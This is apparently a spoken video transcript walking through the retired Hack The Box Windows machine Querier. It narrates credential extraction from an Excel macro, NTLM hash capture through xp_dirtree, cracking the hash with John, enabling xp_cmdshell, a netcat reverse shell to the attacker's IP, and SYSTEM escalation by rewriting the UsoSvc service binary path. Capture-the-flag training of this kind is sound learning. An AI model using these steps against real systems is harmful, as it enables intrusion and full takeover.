I do think that I drank way too much. We're not going to let this stop us. We're NT Authority system, baby. Welcome back to DIY Security. So today we're going to do another hack the box room. It's a retired machine called Querier. It's a medium machine, Windows, and I've actually already done this video. This is the third time. So third time's a charm. The first one was on stream. It was way too long, and my video editing software just couldn't handle it, I guess. Need some more RAM and more space. So that may be a video coming soon, hopefully, to upgrade my PC's hardware. But yeah, it's a video I recorded last night. I recorded the whole video without the mic, the audio. So here we are again at it. Let's get right to it. As always, we run us a nmap scan, and we can see here on port 445 we have Microsoft DS. This is actually a SMB that's open, and on 1433 we have a MS SQL. So the majority of the machine will actually, to give you guys a hint, will be having to do with SQL Server. This SQL. Really cool. Let's get right to it. So first we'll do a SMB client on well, we do a -L, do some slashes, and I'm sorry if my energy is not quite there, you guys. I just came back from my friend's wedding, and I do think that I drank way too much, so I'm feeling pretty bad. Okay, so within the SMB, we can see we have admin, we have C, IPC, and reports. So I tried to connect to IPC, and we can't like look around. We can't really execute any commands properly. Now reports, I was actually able to get into, so we can go right into reports, get rid of that L, reports, and we can see we have this this currency volume report XLSM. So we go ahead and get it. So when we originally get that file from the SMB, we can just cat it out at first just to see what the heck's inside. And as we can see, it's just, I mean, they have some readable letters within here, but a lot of it is just mumbo jumbo, right? We can't even really understand it. It's in some kind of encoded method that the concatenate or the cat from our Linux system just doesn't understand. So we will do a file on the current volume report, and we can see, I said current volume, it's currency volume report, and we can see that it is a XLSM, as I mentioned, Microsoft Excel. So it's a Microsoft Excel page, and to get a little better view into what it might have inside, we can do a bin walk. We'll do a bin walk, currency, and this bin walk actually shows a good bit. We got some zip archive datas, and it even tells us like we got some kind of workbook .xml. We got a bunch of different archives, seems like, right? So we'll do the same thing. We'll run our bin walk, but we can just do a -E for extract, in case you guys didn't know. And you may have to put some single quotes. It may work without it. I think I put single quotes, but I've already done this, so I'm not actually going to run this command. And we're going to just, well, I'll just show you. So you can see here, once running that command, we have this currency volume report extracted, and it allows us to go directly into the directory as if we're using it or viewing it locally. That's pretty cool. So we'll cd into currency ls, and at this point, of course, we would want to like go and enumerate pretty much everything in all these directories, which I have already done. And here is a fair warning: if you guys are not wanting spoilers and you want to solve this box all by yourself, you may as well click off now, because I'm just jumping straight to the point. We're not going to be doing enumeration. I've already done all this stuff live. It was way too long, so this is a speed run. We're just getting right to the point. And so I believe I went to Excel, did a ls, and it was in this VBA project that I found something of interest. We'll do a cat VBA. So originally, I actually looked through this, and you know, I marked stuff like sheet ID, IDs. I was marking all kind of things that you can see in my notes. For a second, see behind the curtains, possible usernames, relationship, ID. But I eventually found something. So we'll just go up a little bit. And within this page, you can see here, we have a UID, or user identification, equals reporting. PWD, or maybe a password, is that. And we can see it here again. PWD is this jumbled up. Seems like a pretty good random password, you know, it doesn't look like a word. So anyway, we go straight into it. So we're going to be using a IM packet library called MSQL client.py, and it will look like MSSQL client.py, and then we could just click enter just to see, and we can see here the positional arguments. They want a domain, a username, they want the password, IP address, or target name. And yeah, that's pretty much it. So we will just run those right in there. They even got for LM hashes and for Windows auth, which we'll actually be using this Windows auth as well in the syntax. So we'll do something like MS SQL client.py. I am terrible at spelling, but I think this is in all caps. Querier. We'll do / reporting is the user. And we'll do a colon, do the single quotes, and I will copy that password, pop it right in, and we'll do the @ symbol, 10.10.125, and we'll just do a dash Windows auth as we seen. So you can see our iPacket seems to be trying to connect, and boom, we are in the SQL server. So it says press help for all commands, so we'll just press help. Right off the back we see enable XP CMD show. They say, you know what it means. I have a feeling, you know, XP CMD show is going to give me a show, right? Now, I'm not going to pretend like I'm some kind of SQL genius, SQL wizard, because I'm definitely not. And I have looked through a lot of different blogs and posts to try to help me along the way. And I ran this machine on guided mode, you guys, and took the hints. So this is a medium machine, but it was hard for me. So getting back to it, when we try to run this XP CMD shell, which is supposed to allow us to run pretty much shell commands through the SQL server, we get a permission denied. So pretty much we don't have the permissions. We're a low-level user. We don't even have permission to be able to do that. So something really cool that I'd found, which is, if I can pull it up, capturing SQL credentials, or capturing the hash, which I'm not going to show you guys the whole entire thing, but this was an article that really helped piece together how I could scrape this if you're inside of an SQL server. So we'll demonstrate that right now. So we'll use, I believe, this might be another IM packet library. Maybe not. SMB server dot py, and we'll do dash SMB support. Well, actually SMB v2, SMB2 support. And before I get all the way there, we'll cd. You can see, if you haven't already, you can make a directory called share, or you can make a directory called transfer, whatever you want to make it. It really doesn't matter. I named mine share, and basically we need to make that directory, because for what we're about to do, we're gonna need to specify a directory there. SMB server.py, and then we did SMB2 support, and it's going to be share, and it's going to be in the share directory. Okay, so they're saying config file parsed. Now we're just going to run a simple command called dirtree, which this was actually one of the hints. So we'll do an execute xp dirtree. Now this was one of the hints that I had taken and looked into, and we'll just do something like our IP address. So 10.10.14.8, and we'll close that off with another slash, and we'll specify our share directory that we've created. And it gets a little funky here. We'll do a single quote, comma, 1, comma, 1. And if this works correctly, we'll scrape the hash. And there you see it. We have scraped the NTLM hash. We got MSQL service. So we got a service. We pretty much scraped the SQL hash for the service. We got Querier. Okay. So we want to copy all of this. We're going to copy the entire hash. Copy it. We'll get on out of here now. And we'll go ahead and put it into something called like password.txt. So now that we have our file in the password.txt, we could run something like hashcat or John the Ripper to try to crack the hash, the NTLM hash. So for me, normally I use my actual machine, my GPU, and use like hashcat on my machine, so to be much faster. But sometimes for these CTFs, you can get away with just using like the RockU and staying local in your virtual machine. It sometimes works, sometimes doesn't. But in this case, it seemed like it did work for me. So we use John, and we do format equals net NTLM v2, and it's going to be for our password, our passwd.txt, word list equals, and we're going to be in user share word list RockU text. We'll try that. So there, pretty quickly, we can see using default input encoding, loaded 1 password hash, net NTLM. So John's kind of weird. It doesn't just like output what it cracked. For some reason, it stores it in a pot file, which I think is completely ridiculous. But we have to run something like John show format equals net NTLM v2, and we'll do our password.txt. So boom, there we can see right here, MSQL service, the password is corporate 568. All right, so using that, now we can actually go ahead and exit out of this. We'll go back into our SQL and we'll try that password out. So we'll go to corporate, delete this. Oops, get that single quote back, and then we will get rid of reporting, and we'll just copy this MSQL service, and we'll try that, see if that gets us in. So there we are. We are back in. We'll run that help command just to see, and we'll try that again. We'll try to do the XP CMD shell, and this time we don't get a like permission denied, but we get a SQL Server blocked access to procedure sys.xp cmd shell of component xp cmd shell. This is because this component is turned off as a part of the security configuration, but they do tell us a system administrator can enable the use of xp cmd shell by using the sp configure. So after some trial and error, we'll say, with some querying, I looked up online. I even asked my friend ChatGPT. I figured out we kind of have to go through these steps of, let's see, we got to execute some commands in the SQL Server. So the first one will look like this: execute sp configure, will show advanced options, comma, 1, semicolon, and then reconfigure. Okay, so we can see it changed from 0, which is normally 0 means not enabled, to 1, which means enabled. And they're saying run the reconfigure. We'll run that in a minute if we have to, because we did just save reconfigure in the command, so maybe it did work. We can see our XP shell is set to 1. We reconfigured, and it says here it's going from 0 to 1. So it is reconfigured. We can verify if the XP CMD shell is enabled by running exc sp configure. We'll do our XP CMD shell, and we'll just end it with a semicolon. And we can see here we have all 1s across the board except for minimum, which the main thing is our run value is set to enable. The config value is set to enable, and the run value is set to enable. So we should be good to go ahead and execute some commands. So we'll go ahead and try. We'll do so we can see when we do our dir c users, we do get command execution. And we see administrator, MS, SQL service, and public. Now we can't just like go into users, administrators. We'll just go straight for the throat, type it out. Now they're trying to say it's disabled for some reason, and this happened quite a bit for some reason. It just kept getting disabled. So what I recommend is have those commands ready to reconfigure it, because for some reason it just loves to unconfigure itself apparently. But when we run that type users administrator desktop root.txt, it says access denied. So we got to get a little more creative. We're not going to let this stop us. It's not going to happen. We got to keep going. We must keep trying. So, well, knowing that we got command execution, now we can try to go for like a reverse shell. So we'll cd into our transfer, and we'll do a netcat dash new verbose listener port on port 444. Sure. So now we're listening, and through here we can do a execute xp cmd show, and we'll do a c reports, because remember we got that reports directory, and we got a netcat.exe, I'm just thinking I may have to actually, we need to go into transfer, and we need to, because we have that nxe sitting there, but we need to transfer it as well. So we will open up our simple Python server, python 3-m http server on port 80. Okay, we got that running. And we will finish off this command. So I actually don't know if this command is going to work without, I don't think it's going to grab it. I think this is for, if I already have it on there. exe at 10.10.14.8 on 4444, and we'll execute the cmd.exe Okay, so yeah, we'll have to switch it up a little bit. What we ended up doing, this will execute it all in one. We just got to change up the IP. So we are 14.8 and we are 14.8. So what we're doing here, we're executing this PowerShell command. We're doing a curl to get our netcat exe. We're outputting it into the target machine, into reports. It's going to be saved as netcat.exe. And then after that, reports, we're executing the reports netcat to connect back to our listener on 4444. And it's going to execute the CMD, hopefully. So it does look like we have to enable or query in the SQL yet again. So we'll configure, it's set from 0 to 1, and we'll enable the CMD show, set from 0 to 1. Now we should be able to run that command again. And as you can see down here, it did grab the netcat. We got a 200, and over here we have a show. So if we do a who am I, we're Querier. we're actually in MS SQL service right now. We do who am I /priv, and you can see we don't really have that many privileges. We're pretty low level privileged user. You have a power up file, which I was having issues trying to get power up, so I ended up going through manually, but we'll try it one more time just to see if it wants to try to work. And that's the wrong IP. Okay, let's try to just correct this IP. Maybe it'll actually try to catch it. Just 14.8. We'll try this one more time. I don't think it's gonna work, but we'll try it anyway. So it's saying that it did grab the power up, but as you can see, it did not run it. It was supposed to run it, so we can CD into our reports. Or CD into, we got to give the full path, so C reports. Okay, we're in reports, and now that we are in there, maybe we'll try to do that command one more time. See what happens. So before it was popping in here, but doesn't even look like it's popping in here now. 14.8. Try this command, it's a little bit different. Invoking the web request, we can see once again it's trying to grab it. Supposedly it's grabbed it and it's actually supposed to just execute, but it didn't. We can see our power up is in here, so we should be able to just run power up. PS1. So we should be able to do something like PowerShell.exe-nop EP, which is execution policy bypass. Let's see what happens when we do that. And we should be able to just do power.ps1. So they're saying just do a ./power.ps1. Maybe I've been doing it the wrong way, but we don't get anything. So anyway, spending way too much time on this. I just manually went through looking at services. Just looking up manually, this was the command that I had found to search manually. We did a SC, we'll query state equals all, and we'll pipe more into that. We'll just get out of that because it's just messing us all up. SC query state equals all, pipe more. So here you can see a list of all the running services, and since we are a service, we can try to like laterally move into another service, but you do want to pay attention to what sometimes a service isn't administrator, and we want a service that's going to be administrator because that's the next level up that we're trying to escalate our privileges, right? User manager. So there we go. USOSVC. It's the Update Orchestrator Service. So what is USOSCV? It's critical for Windows to download the latest Windows updates. Therefore, it has and runs as administrator with administrator privileges, or System 32. So knowing this, we can see it's running Windows 32, stoppable, not pausable except shutdown. We want to try to change the binary path. We're going to try to exploit this by changing the path that it takes to open. Okay. So let's see. Got this going. I think we could just exit out of this now. We will actually start a new NC netcat, new verbose listener port on 445 this time. We'll start that up, and we will change the binary bin path to scconfig uso svc. The bin path equals, and then we'll just do c reports ncat.exe, and then we will put our IP, which is 10.10.14.8, and we'll do on 4445, and we'll do a -e for execute cmd.exe, and we'll see if this works to get us a show. So it says success, so we can do scqc uso svc. So the SC, actually, it stands for Service Control Manager, I believe, and the QC stands for Query Configuration, in case you guys wanted to know. And so when we do the scqc, we can see that we have changed the binary path name. So now all we should have to do is stop. We'll do a sc stop uso svc. So stop is pending, and then we will sc start uso svc, and boom, we can see here we have a show. We're NT Authority System, baby. We are in there. You can see we have a lot more privileges here, and yeah, we have pwned the machine. We are in there, System 32. That's going to be it, you guys. If you appreciate this video, or you found what you watched interesting or useful, make sure you hit that like button, please. And do please consider subscribing or hitting that follow button. It really goes a long way and it helps. So, you guys, keep it cool. Be the change that you want to see, the good change. And until next time, happy hacking. Peace out.